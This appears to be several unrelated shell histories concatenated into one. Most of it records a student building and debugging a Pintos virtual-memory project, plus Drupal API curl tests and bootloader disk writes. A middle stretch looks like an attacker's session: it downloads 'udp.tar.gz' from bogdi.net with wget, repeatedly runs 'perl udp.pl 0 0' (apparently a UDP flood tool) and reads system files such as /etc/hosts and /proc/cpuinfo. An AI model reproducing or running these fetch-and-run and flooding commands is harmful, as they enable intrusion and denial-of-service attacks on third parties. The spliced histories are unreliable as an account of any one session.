--swap-size=4 -- -q -f -ul=12 run page-parallel +make +pintos -j 1 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=12 run page-parallel +make +pintos -j 1 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=12 run page-parallel +pintos -j 2 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=12 run page-parallel +pintos -j 3 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=12 run page-parallel +pintos -j 4 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=12 run page-parallel +pintos -j 5 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=12 run page-parallel +pintos -j 8 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=12 run page-parallel +pintos -j 8 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=13 run page-parallel +pintos -j 1 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=13 run page-parallel +pintos -j 1 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=12 run page-parallel +pintos -j 1 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=11 run page-parallel +pintos -j 2 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=11 run page-parallel +pintos -j32 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=11 run page-parallel +pintos -j 3 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=11 run page-parallel +pintos -j 3 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=10 run page-parallel +pintos -j 2 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=10 run page-parallel +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f run page-parallel +pintos -j 1 -v -k -T 60 --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f run page-parallel +clear +make +pintos -j 3 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=11 run page-parallel +pintos -j 3 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=10 run page-parallel +pintos -j 1 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=11 run page-parallel +pintos -j 1 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=12 run page-parallel +pintos -j 1 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=11 run page-parallel +make +clear +ls +pintos --gdb -j 1 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=10 run page-parallel +make +pintos --gdb -j 1 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=10 run page-parallel +make +pintos --gdb -j 1 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=10 run page-parallel +quit +clear +pintos --gdb -j 1 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=10 run page-parallel +clear +pintos --gdb -j 1 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=10 run page-parallel +clear +pintos --gdb -j 1 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=10 run page-parallel +make +pintos -j 1 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=10 run page-parallel +clear +make +pintos -j 1 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=10 run page-parallel +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f run page-parallel +make check +make +clear +make check +ls +vim process.c +ls +vim frame.c +vim frame.h +vim frame.c +vim frame.h +vim frame.c +vim frame.h +vim frame.c +vim frame.h +vim frame.c +clear +vim page.c +vim frame.c +vim page-linear.c +vim page-parallel.c +vim child-linear.c +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f run page-parallel +make +make check +make clean +make +clear +make check +clear +pintos -v -k -T 600 --qemu --filesys-size=2 -p tests/vm/page-merge-seq -a page-merge-seq -p tests/vm/child-sort -a child-sort --swap-size=4 -- -q -f run page-merge-seq +backtrace Call stack: 0xc002ab92 0xc0023437 0xc002d5a0 0xc002d73d 0xc00211c4 0xc002f014 0xc002f26d 0xc00221c5 0xc002241d 0xc003218c 0xc0032286 0xc002f026 0xc002f1c3 0xc00221c5 0xc002241d 0xc0027087 0xc002706e 0xc0026e0f 0xc0025d3a 0xc002651f 0xc0025d3a 0xc0031561 0xc00308f6 0xc002f9bb 0xc002fdc4 0xc00221c5 0xc002241d 0x804ab92 0x804811c 0x8048912. +make +clear +pintos -v -k -T 600 --qemu --filesys-size=2 -p tests/vm/page-merge-seq -a page-merge-seq -p tests/vm/child-sort -a child-sort --swap-size=4 -- -q -f run page-merge-seq +clear +make +pintos -v -k -T 600 --qemu --filesys-size=2 -p tests/vm/page-merge-seq -a page-merge-seq -p tests/vm/child-sort -a child-sort --swap-size=4 -- -q -f run page-merge-seq +clear +make +pintos -v -k -T 600 --qemu --filesys-size=2 -p tests/vm/page-merge-seq -a page-merge-seq -p tests/vm/child-sort -a child-sort --swap-size=4 -- -q -f run page-merge-seq +clear +make +pintos -v -k -T 600 --qemu --filesys-size=2 -p tests/vm/page-merge-seq -a page-merge-seq -p tests/vm/child-sort -a child-sort --swap-size=4 -- -q -f run page-merge-seq +q! +make +pintos -v -k -T 600 --qemu --filesys-size=2 -p tests/vm/page-merge-seq -a page-merge-seq -p tests/vm/child-sort -a child-sort --swap-size=4 -- -q -f run page-merge-seq +clear +make +pintos -v -k -T 600 --qemu --filesys-size=2 -p tests/vm/page-merge-seq -a page-merge-seq -p tests/vm/child-sort -a child-sort --swap-size=4 -- -q -f run page-merge-seq +clear +vim process.c +vim exception.c +vim process.c +vim exception.c +ls +ls +clear +ls +ls +vim page-merge-stk.c +vim parallel-merge.c +vim page-merge-seq.c +vim page-merge-stk.c.c +vim page-merge-stk.c +vim parallel-merge.c +vim page-merge-seq.c +clear +vim page-merge-seq.c +vim page-merge-mm.c +ls +vim child-qsort-mm.c +clear +ls +clear +ls +vim page-merge-seq.c +vim child-sort.c +git add . +git status +git commit -m "page parallel" +git push +ls +clear +vim exception.c +vim exception.h +vim exception.c +vim exception.h +vim exception.c +vim exception.h +vim exception.c +vim exception.h +vim exception.c +make +pintos-gdb kernel.o +deb +pintos-gdb kernel.o +clear +pintos-gdb kernel.o +make +clear +make +ls +ls +vim open-boundary.c +vim read-boundary.c +ls +clear +ls +vim pt-grow-stk-sc.c +make +clear +make +make check +ls +clear +vim exception.c +vim exception.h +vim exception.c +ls +vim thread.h +vim thread.c +ls +vim exception.c +ls +vim thread. +vim thread.h +clear +vim string.h +vim string.c +ls +make +pintos --gdb -v -k --bochs --filesys-size=2 -p tests/userprog/open-boundary -a open-boundary -p ../../tests/userprog/sample.txt -a sample.txt --swap-size=4 -- -q -f run open-boundary +make +clear +pintos -v -k --bochs --filesys-size=2 -p tests/userprog/open-boundary -a open-boundary -p ../../tests/userprog/sample.txt -a sample.txt --swap-size=4 -- -q -f run open-boundary +make check +clear +make +amke +make +make clean +clear +make +clear] +make +clear +make +clear +make +make clean +make +clear +make +make check +make +clear +In kernel.o: +0xc002ab82: debug_panic (.../../lib/kernel/debug.c:38) +0xc00235fa: lock_release (...../../threads/synch.c:292) +0xc00326ed: frame_search_and_pin (...uild/../../vm/frame.c:152) +0xc002f5a2: vm_with_pinning (.../../userprog/syscall.c:74) +0xc002fbf6: sys_read (...../userprog/syscall.c:312) +0xc00300f4: syscall_handler (...../userprog/syscall.c:484) +0xc00221b5: intr_handler (..../threads/interrupt.c:367) +0xc002240d: intr_entry (threads/intr-stubs.S:38) +In tests/userprog/read-boundary: +0x0804ac2a: read (...../lib/user/syscall.c:117) +0x080480ec: test_main (...erprog/read-boundary.c:21) +0x08048254: main (...ild/../../tests/main.c:13) +0x080489aa: _start (.../../../lib/user/entry.c:9) +clear +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/read-boundary -a read-boundary -p ../../tests/userprog/sample.txt -a sample.txt --swap-size=4 -- -q -f run read-boundary +make check +vim process.c +vim exception.c +vim process.c +vim exception.c +vim syscall.c +cscope +ckear +clear +ls +vim syscall.c +vim exception.c +vim syscall.c +ls +ls +vim syscall.c +clear +vim frame.h +vim frame.c +vim frame.h +vim page.h +clear +vim page.c +vim swap.c +vim frame.c +vim frame.h +vim frame.c +vim frame.h +vim frame.c +ls +cscope +clear +ls +ls +vim frame.c +make +makje +maek +make +clear +make +clear +make +clear +make +maek +make +amek +make +clear +make +make check +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/open-boundary -a open-boundary -p ../../tests/userprog/sample.txt -a sample.txt --swap-size=4 -- -q -f run open-boundary +clear +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/open-boundary -a open-boundary -p ../../tests/userprog/sample.txt -a sample.txt --swap-size=4 -- -q -f run open-boundary +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/open-boundary -a open-boundary -p ../../tests/userprog/sample.txt -a sample.txt --swap-size=4 -- -q -f run open-boundary +vim pt-grow-stk-sc.c +ls +pintos-gdb kernel.o +clear +ls +vim exception.c +pintos --gdb -v -k --bochs --filesys-size=2 -p tests/vm/pt-grow-stk-sc -a pt-grow-stk-sc --swap-size=4 -- -q -f run pt-grow-stk-sc +make +pintos --gdb -v -k --bochs --filesys-size=2 -p tests/vm/pt-grow-stk-sc -a pt-grow-stk-sc --swap-size=4 -- -q -f run pt-grow-stk-sc +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/vm/pt-grow-stk-sc -a pt-grow-stk-sc --swap-size=4 -- -q -f run pt-grow-stk-sc +backtrace Call stack: 0xc002ab82 0xc002e894 0xc002f23c 0xc002f5e4 0xc002fbf6 0xc00300f4 0xc00221b5 0xc002240d 0x804ac64 0x80481c0 0x80489b2 0x80489e4. +make +pintos --gdb -v -k --bochs --filesys-size=2 -p tests/vm/pt-grow-stk-sc -a pt-grow-stk-sc --swap-size=4 -- -q -f run pt-grow-stk-sc +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/vm/pt-grow-stk-sc -a pt-grow-stk-sc --swap-size=4 -- -q -f run pt-grow-stk-sc +make check +make clean +make check +make clean +make check +git add . +git status +git commit -m "mm left" +git push +make clean +make check +make clean +make check +vim pagedir.c +vim frame.c +makecheck +make chekc +make check +ls +clear +vim vim frame.c +vim frame.c +vim page.c +vim frame.c +vim page.h +vim page.c +vim page.h +vim page.c +vim page.h +vim frame.c +cledar +vim page.c +vim frame.c +vim page.c +vim page.h +clear +ls +vim syscall.c +vim exception.c +vim page.h +vim exception.c +vim frame.h +ls +clear +vim syscall.c +vim synch.c +vim exception.c +vim syscall.c +vim process.c +vim syscall.c +vim exception.c +vim syscall.c +vim process.c +clear +vim process.c +vim exception.c +vim process.c +ls +vim thread.h +vim thread.c +ls +vim process.c +vim exception.c +vim process.c +vim exception.c +vim syscall.c +cscope +clear +make +clear +make check +cscope +make +make check +make clean +make +clear +make check +make clean +make check +make clean +make check +make clean +clear +make check +make +make check +clear +make +make check +make +make check +clear +CD .. +cscope +cscope +ls +clear +vim thread.h +vim thread.c +vim thread.h +vim thread.c +vim thread.h +vim the +vim thread.c +vim page.h +vim page.c +vim page.h +vim frame.c +vim frame.h +vim frame.c +vim swap.c +vim frame.c +vim frame.h +make +make check +clear +make +make check +clear +vim page.c +vim page.h +vim page.c +make +make check +clear +make +make check +clear +make +amke +make +clear +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/vm/mmap-overlap -a mmap-overlap -p tests/vm/zeros -a zeros --swap-size=4 -- -q -f run mmap-overlap +clear +vim exception.c +vim syscall.c +vim syscall.h +vim syscall.c +vim syscall.h +vim syscall.c +vim syscall.h +git add . +git status +git commit -m "except page-merge-mm" +git push +clear +vim syscall.c +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/vm/page-merge-mm -a page-merge-mm -p tests/vm/child-qsort-mm -a child-qsort-mm --swap-size=4 -- -q -f run page-merge-mm +make +pintos --gdb -j 30 -v -k --bochs --filesys-size=2 -p tests/vm/page-merge-mm -a page-merge-mm -p tests/vm/child-qsort-mm -a child-qsort-mm --swap-size=4 -- -q -f run page-merge-mm +make +pintos -j 30 -v -k --bochs --filesys-size=2 -p tests/vm/page-merge-mm -a page-merge-mm -p tests/vm/child-qsort-mm -a child-qsort-mm --swap-size=4 -- -q -f run page-merge-mm +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/vm/page-merge-mm -a page-merge-mm -p tests/vm/child-qsort-mm -a child-qsort-mm --swap-size=4 -- -q -f run page-merge-mm +clear +make check +ls +vim child-qsort-mm.c +cscope +vim synch.h +vim thread.h +vim synch.c +vim process.c +vim page.h +clear +vim frame.c +vim syscall.c +vim exception.c +vim process.c +vim syscall.c +vim exception.c +vim frame.c +clear +vim exception.c +vim process.c +vim exception.c +vim process.c +vim exception.c +vim process.c +vim frame.c +make +clear +make +clear +vim init.c +dc .. +vim mmap-null.c +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/vm/mmap-null -a mmap-null -p ../../tests/vm/sample.txt -a sample.txt --swap-size=4 -- -q -f run mmap-null +make +clear +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/vm/mmap-null -a mmap-null -p ../../tests/vm/sample.txt -a sample.txt --swap-size=4 -- -q -f run mmap-null +make +clear +vim file.h +vim page.c +vim page.h +vim swap.c +vim frame.c +vim page.c +vim file.c +rm .file.c.swp +make +clear +make check +clear +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/vm/page-merge-mm -a page-merge-mm -p tests/vm/child-qsort-mm -a child-qsort-mm --swap-size=4 -- -q -f run page-merge-mm +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/vm/page-merge-mm -a page-merge-mm -p tests/vm/child-qsort-mm -a child-qsort-mm --swap-size=4 -- -q -f run page-merge-mm +pintos-gdb kernel.o +clear +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/vm/page-merge-mm -a page-merge-mm -p tests/vm/child-qsort-mm -a child-qsort-mm --swap-size=4 -- -q -f run page-merge-mm +pintos -j 8 -v -k --bochs --filesys-size=2 -p tests/vm/page-merge-mm -a page-merge-mm -p tests/vm/child-qsort-mm -a child-qsort-mm --swap-size=4 -- -q -f run page-merge-mm +pintos -j 11 -v -k --bochs --filesys-size=2 -p tests/vm/page-merge-mm -a page-merge-mm -p tests/vm/child-qsort-mm -a child-qsort-mm --swap-size=4 -- -q -f run page-merge-mm +pintos -j 13 -v -k --bochs --filesys-size=2 -p tests/vm/page-merge-mm -a page-merge-mm -p tests/vm/child-qsort-mm -a child-qsort-mm --swap-size=4 -- -q -f run page-merge-mm +pintos -j 15 -v -k --bochs --filesys-size=2 -p tests/vm/page-merge-mm -a page-merge-mm -p tests/vm/child-qsort-mm -a child-qsort-mm --swap-size=4 -- -q -f run page-merge-mm +pintos -j 17 -v -k --bochs --filesys-size=2 -p tests/vm/page-merge-mm -a page-merge-mm -p tests/vm/child-qsort-mm -a child-qsort-mm --swap-size=4 -- -q -f run page-merge-mm +pintos -j 19 -v -k --bochs --filesys-size=2 -p tests/vm/page-merge-mm -a page-merge-mm -p tests/vm/child-qsort-mm -a child-qsort-mm --swap-size=4 -- -q -f run page-merge-mm +pintos -j 21 -v -k --bochs --filesys-size=2 -p tests/vm/page-merge-mm -a page-merge-mm -p tests/vm/child-qsort-mm -a child-qsort-mm --swap-size=4 -- -q -f run page-merge-mm +pintos -j 22 -v -k --bochs --filesys-size=2 -p tests/vm/page-merge-mm -a page-merge-mm -p tests/vm/child-qsort-mm -a child-qsort-mm --swap-size=4 -- -q -f run page-merge-mm +pintos -j 21 -v -k --bochs --filesys-size=2 -p tests/vm/page-merge-mm -a page-merge-mm -p tests/vm/child-qsort-mm -a child-qsort-mm --swap-size=4 -- -q -f run page-merge-mm +pintos -j 25 -v -k --bochs --filesys-size=2 -p tests/vm/page-merge-mm -a page-merge-mm -p tests/vm/child-qsort-mm -a child-qsort-mm --swap-size=4 -- -q -f run page-merge-mm +pintos -j 24 -v -k --bochs --filesys-size=2 -p tests/vm/page-merge-mm -a page-merge-mm -p tests/vm/child-qsort-mm -a child-qsort-mm --swap-size=4 -- -q -f run page-merge-mm +pintos -j 26 -v -k --bochs --filesys-size=2 -p tests/vm/page-merge-mm -a page-merge-mm -p tests/vm/child-qsort-mm -a child-qsort-mm --swap-size=4 -- -q -f run page-merge-mm +pintos -j 28 -v -k --bochs --filesys-size=2 -p tests/vm/page-merge-mm -a page-merge-mm -p tests/vm/child-qsort-mm -a child-qsort-mm --swap-size=4 -- -q -f run page-merge-mm +pintos -j 30 -v -k --bochs --filesys-size=2 -p tests/vm/page-merge-mm -a page-merge-mm -p tests/vm/child-qsort-mm -a child-qsort-mm --swap-size=4 -- -q -f run page-merge-mm +make +pintos-gdb kernel.o +clear +pintos-gdb kernel.o +clear +make +clear +make check +makle +make +clear +make check +clear +ls +vim page.c +ls +vim list.c +cscope +clear +vim page.c +vim frame.c +vim page.c +vim mmap-null.c +vim mmap-null.ck +vim page-merge-mm.c +ls +vim child-qsort-mm.c +clear +ls +vim parallel-merge.c +ls +ls +make clean +tar -czvf team22_project3.tar.gz src Project_3_Document_Templete.docx +ls +vim team22_project3.tar.gz +ls +ls +ls +vim dir-rmdir.c +cscope +ls +ls +vim frame.c +page.c +vim page.c +vim swap.c +ls +vim exception.c +vim syscall.c +make +make clean +make check +make clean +make +make check +make clean +make +make check +vim filesys.c +ls +ls +vim block.c +vim interrupt.c +ls +vim inode.c +ls +vim inode.c +clear +vim frame.c +make +make check +vim frame.h +clear +ls +ls +vim process.c +cscope +ls +ls +clear +ls +vim thread.c +vim inode.c +clear +ls +vim timer.c +ls +ls +vim inttypes.h +cscope +vim timer.c +vim timer.h +vim stdint.h +ls +ㅣㄴ +ls +clear +ls +vim timer.c +vim inode.c +ls +;s +ls +vim block.h +clear +ls +clear +ls +vim cache.c +ls +vim cache.h +vim cache.c +cp cache.c ../filesys/cache.c +cp cache.h ../filesys/cache.h +ls +rm cache.c +rm cache.h +ls +make +clear +make +clear +make +clear +ls +make clean +clear +make +ls +ls +ls +vim Makefile +clear +ls +make +ls +ls +vim init.o +ls +ls +ls +ls +clear +make check +clear +make clean +make +ls +ls +vim Makefile +ls +ls +ls +ls +ls +ls +vim Make.config +vim Makefile.build +ls +ls +ls +vim cache.c +make +clar +clear +make clean +make +vim cache.c +ls +vim Makefile +ls +vim Make.vars +clear +make +clear +make +clear +ls +clear +ls +vim file.c +vim cache.x +vim cache.c +ls +vim cache.c +vim init.c +vim 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' +mkdir ' ' +ftp darkiy.site.io +wget +wget bogdi.net/downloads/udp.tar.gz +tar -xzvf udp.tar.gz +rm -rf udp.tar.gz +wget +ls -la +perl udp.pl 0 0 +chmod +x * +ls +perl udp.pl 0 0 +perl udp.pl 0 0 +ls +wget +perl udp.pl 0 0 +cat /proc/cpuinfo +ls -la +cat /etc/issue +etc/rc.d/init.d +cat /etc/hosts +netstat -aut +cat /etc/hosts +logout +ls +pwd +ls +ls +ls +ls +ls +H:/ +H: +H:\ +H: +H:/ +ls +c:/ +ls +C +H +H: +ls +C:/ +ls +ls +bash +ls +vim haskell +mpm +npm +ls +ls +pwd +vi hello +vi -v +vi +vim +vi ~/.bashrc +ls +vi ~/.bashrc +vim ~/.bashrc +vi ~/.bashrc +vim helo +vi ~/.bashrc +vi ~/.bashrc +bash +vi ~/.bashrc +clear +ls +ls +ls +ls +bash +ls +ls +mkdir nodejs +ls +mkdir nodejs +ls +npm install express +ls +npm install fs +ls +tmux +vim hello +vim ~/.vimrc +tmux +bash +ls +ls +rm -r 6_29_bk/ +ls +git remote add origin git@bitbucket.org:hqp6684/shiny_drupal_root.git +ls +ls +ls +ls -a +ls +git init +git remote add origin git@bitbucket.org:hqp6684/shiny_drupal_root.git +ls +git add . +git commit -m"create schema for shiny module" +git push origin master +git add . +git history +git his +git show +clear +git commit history +git log +5e63319381de6dfb8e358cf7dce7c5d65c68853a +ls +clear +git branch newblock +git checkout newblock +ls +curl +curl +cURL +bash +curl +curl --help +ssh +exit +ls +clear +ls +ls +git status +git branch +git add . +git commit -m" create two schemas : shiny and shiny_config in install" +git add . +git commit -m"set default values for some fields for dev-testing sake" +exit +exit +curl --help +curl st/drupal7/shiny/api/resgister +' +curl +c;ear +clear +curl -v --data "email=seomthing@com&user=account"st/drupal7/shiny/resgister +curl -v --data "email=seomthing@com&user=account"st/drupal7/shiny/resgister +clear +clear +curl -v --data "email=seomthing@com&user=account"st/drupal7/shiny/resgister +curl -v --data "email=seomthing@com&user=account"st/drupal7/shiny/resgister +curl -v --data "email=seomthing@com&user=account"shiny/resgister +curl -v --data "email=seomthing@com&user=account"shiny/resgister +curl +' +curl +curl +curl +curl +curl -H "Content-Type: application/json" -X POST -d '{"data1": "helo","data2":2}' +curl -H "Content-Type: application/json" -X POST -d '{"data1": "helo","data2":2}'shiny/register +curl -H "Content-Type: application/json" -X POST -d '{"data1": "helo","data2":2}'shiny/register +curl -H "Content-Type: application/json" -X POST -d '{"data1": "helo","data2":2}'shiny/register +curl -H "Content-Type: application/json" -X POST -d '{"data1": "helo","data2":2}'shiny/register +curl -H "Content-Type: application/json" -X POST -d '{"data1": "helo","data2":2}'shiny/register +clear +curl -H "Content-Type: application/json" -X POST -d '{"nid": 123,"type": "data", "name" :"daname"}'shiny/register +curl -H "Content-Type: application/json" -X POST -d '{"nid": 123,"type": "data", "name" :"daname"}'shiny/register +curl -H "Content-Type: application/json" -X POST -d '{"nid": 123,"type": "data", "name" :"daname"}'shiny/register +curl -H "Content-Type: application/json" -X POST -d '{"nid": 123,"type": "data", "name" :"daname"}'shiny/register +curl -H "Content-Type: application/json" -X POST -d '{"nid": 123,"type": "data", "name" :"daname"}'shiny/register +curl -H "Content-Type: application/json" -X POST -d '{"nid": 123,"type": "data", "name" :"daname"}'shiny/register +curl -H "Content-Type: application/json" -X POST -d '{"nid": 123,"type": "data", "name" :"daname"}'shiny/register +curl -H "Content-Type: application/json" -X POST -d '{"nid": 123,"type": "data", "name" :"daname"}'shiny/register +curl -H "Content-Type: application/json" -X POST -d '{"nid": 123,"type": "data", "name" :"daname"}'shiny/register +curl -H "Content-Type: application/json" -X POST -d '{"nid": 123,"type": "data", "name" :"daname"}'shiny/register +curl -H "Content-Type: application/json" -X POST -d '{"nid": 123,"type": "data", "name" :"daname"}'shinyApi/register +curl -H "Content-Type: application/json" -X POST -d '{"nid": 123,"type": "data", "name" :"daname"}'shinyApi/register +curl -H "Content-Type: application/json" -X POST -d '{"nid": 123,"type": "data", "name" :"daname"}'shinyApi/register +curl -H "Content-Type: application/json" -X POST -d '{"nid": 123,"type": "data", "name" :"daname234"}'shinyApi/register +curl -H "Content-Type: application/json" -X POST -d '{"nid": 123,"type": "data", "name" :"daname234"}'shinyApi/register +curl -H "Content-Type: application/json" -X POST -d '{"nid": 123,"type": "data", "name" :"daname234"}'shinyApi/register +curl -H "Content-Type: application/json" -X POST -d '{"nid": 123,"type": "data", "name" :"daname234"}'shinyApi/register +curl -H "Content-Type: application/json" -X POST -d '{"nid": 123,"type": "data", "name" :"daname234"}'shinyApi/register +curl -H "Content-Type: application/json" -X POST -d '{"nid": 123,"type": "data", "name" :"daname234"}'shinyApi/register +curl -H -D "Content-Type: application/json" -X POST -d '{"nid": 123,"type": "data", "name" :"daname234"}'shinyApi/register +curl -H -i "Content-Type: application/json" -X POST -d '{"nid": 123,"type": "data", "name" :"daname234"}'shinyApi/register +curl -H -I "Content-Type: application/json" -X POST -d '{"nid": 123,"type": "data", "name" :"daname234"}'shinyApi/register +curl -H -I "Content-Type: application/json" -X POST -d '{"nid": 123,"type": "data", "name" :"daname234"}'shinyApi/register +curl -H -I "Content-Type: application/json" -X POST -d '{"nid": 123,"type": "data", "name" :"daname234"}'shinyApi/register +curl -H -I "Content-Type: application/json" -X POST -d '{"nid": 123,"type": "data", "name" :"daname234"}'shinyApi/register +curl -H "Content-Type : application/json" -X POST -d '{"nid": 123,"type": "data", "name" :"daname234"}'shinyApi/register +curl -H "Content-Type : application/json" -X POST -d '{"nid": 123,"datablock_type": "gainer", "datablock_name" :"some datablock name"^CshinyApi/register +curl -H "Content-Type : application/json" -X POST -d '{"nid": 123,"datablock_type": "gainer", "datablock_name" :"some datablock name"shinyApi/register +curl -H "Content-Type : application/json" -X POST -d '{"nid": 123,"datablock_type": "gainer", "datablock_name" :"some datablock name"}'shinyApi/register +curl -H "Content-Type : application/json" -X POST -d '{"nid": 123,"datablock_type": "gainer", "datablock_name" :"some datablock name"}'shinyApi/register +curl -H "Content-Type : application/json" -X POST -d '{"nid": 14,"datablock_type": "gainer2", "datablock_name" :"some datablock name"}'shinyApi/register +curl -H "Content-Type : application/json" -X POST -d '{"nid": 14,"datablock_type": "gainer2", "datablock_name" :"some datablock name"}'shinyApi/register +curl -H "Content-Type : application/json" -X POST -d '{"nid": 14,"datablock_type": "gainer2", "datablock_name" :"some datablock name"}'shinyApi/register +curl -H "Content-Type : application/json" -X POST -d '{"nid": 14,"datablock_type": "gainer2", "datablock_name" :"some datablock name"}'shinyApi/register +curl -H "Content-Type : application/json" -X POST -d '{"nid": 14,"datablock_type": "gainer2", "datablock_name" :"some datablock name"}'shinyApi/register +ls +tmux +exit +ll +laceup -w 1 /dev/hd0 +dd if=/dev/hd0 of=MBR3 bs=512 count=1 +ll +mcopy MBR3 b: +mcopy part13 b: +sync +sync +exit +ls +bootlace +ls +ll +chmod 711 bootlace +ls +ll +./bootlace +objdump bootlace +objdump bootlace -r +od +od +ls +hexdump bootlace +hexdump bootlace | more +hexdump laceup | more +hexdump bootlace | more +ls +pwd +ls +ls +cat Readme +cat readme | more +ls +cat config | more +exit +ls +laceup -w /dev/hde0 +laceup -w /dev/hd0 +laceup -w 1 /dev/hd1 wini +/etc/laceup -w 1 /dev/hd1 wini +/etc/laceup /dev/hd0 wini +/etc/laceup -w 1 /dev/hd1 wini +/etc/laceup -w 1 /dev/hd1 +/etc/laceup -w 1 /dev/hd0 +/etc/laceup /dev/hd1 wini +/etc/laceup -w 1 /dev/hd0 +pwd +ls +ll +ll / +ls +dd if=MBR3 of=/dev/hd0 bs=512 count=1 +dd if=part13 of=/dev/hd1 bs=512 count=1 +ls +laceup -w 1 /dev/hd0 +laceup /dev/hd1 wini +sync +sync +ls +ll +chmod 755 bootlace +ls +ll +chmod 755 winiboot +ll +chmod 644 config +chmod 644 disktab +ls +ll +laceup -w 1 /dev/hd0 +laceup /dev/hd1 wini +exit +mdir b: +mcopy b:mbr3 mbr3 +ls +hexdump mbr3 +dd if=mbr3 of=/dev/hd0 bs=512 count=1 +sync +sync +exit +ls +ll +dd if=MBR3 of=/dev/hd0 bs=512 count=1 +sync +sync +sync +exit +dir +dd if=/dev/hd1 of=part14 bs=512 count=2 +ll +hexdump -x part14 | more +hexdump part14 | more +hexdump part14 | more +ls +ll +hexdump Image | more +chroot +rootdev +rdev +chod +od +vd +ls +ls +ls +vi Makefile +ll +make clean +make +vi Makefile +ll +rm Image +make +ls +vi config +laceup /dev/hd1 wini +cp /usr/src/linux/Image . +ls +ll +exit +ls +ll +rm part* +ls +ll +rm MBR* +ls +ll +rm mbr3 +ls +ll +rm 